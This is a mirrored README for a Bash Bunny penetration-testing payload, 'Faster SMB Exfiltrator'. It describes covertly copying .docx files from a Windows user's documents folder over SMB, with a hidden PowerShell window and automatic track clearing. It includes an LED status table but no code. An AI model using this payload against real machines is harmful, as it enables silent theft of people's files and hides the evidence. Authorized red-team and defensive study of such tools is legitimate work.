mirror of
https://github.com/hak5darren/bashbunny-payloads.git
synced 2025-10-29 16:58:12 +00:00
37 lines
1.4 KiB
Markdown
37 lines
1.4 KiB
Markdown
# Faster SMB Exfiltrator
|
|
|
|
* Author: Hak5Darren
|
|
* Props: ImNatho, mike111b, madbuda
|
|
* Version: Version 1.0
|
|
* Target: Windows XP SP3+ (Powershell)
|
|
* Category: Exfiltration
|
|
* Attackmodes: HID, Ethernet
|
|
|
|
## Description
|
|
|
|
Exfiltrates select files from users's documents folder via SMB.
|
|
Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME
|
|
|
|
Rewrite of the original SMB Exfiltrator payload with:
|
|
* Faster copying, using robocopy multithreaded mode
|
|
* Faster finish, using a EXFILTRATION_COMPLETE file
|
|
* Offload logic to target PC for accurate date/time
|
|
* Clears tracks by default without second run dialog
|
|
* Test-Connection handling by ICMP (no lame sleeps)
|
|
* Hidden powershell window by default
|
|
|
|
|
|
## Configuration
|
|
|
|
Configured to copy docx files by default. Change $exfil_ext in s.ps1 to desired.
|
|
|
|
## STATUS
|
|
|
|
| LED | Status |
|
|
| ------------------- | -------------------------------------- |
|
|
| Red (blinking) | Impacket not found in /pentest |
|
|
| Magenta (blinking) | HID Stage |
|
|
| Magenta | Ethernet Stage |
|
|
| Magenta/Blue | Receiving files |
|
|
| White | Moving liberated files to mass storage |
|
|
| Green | Finished | |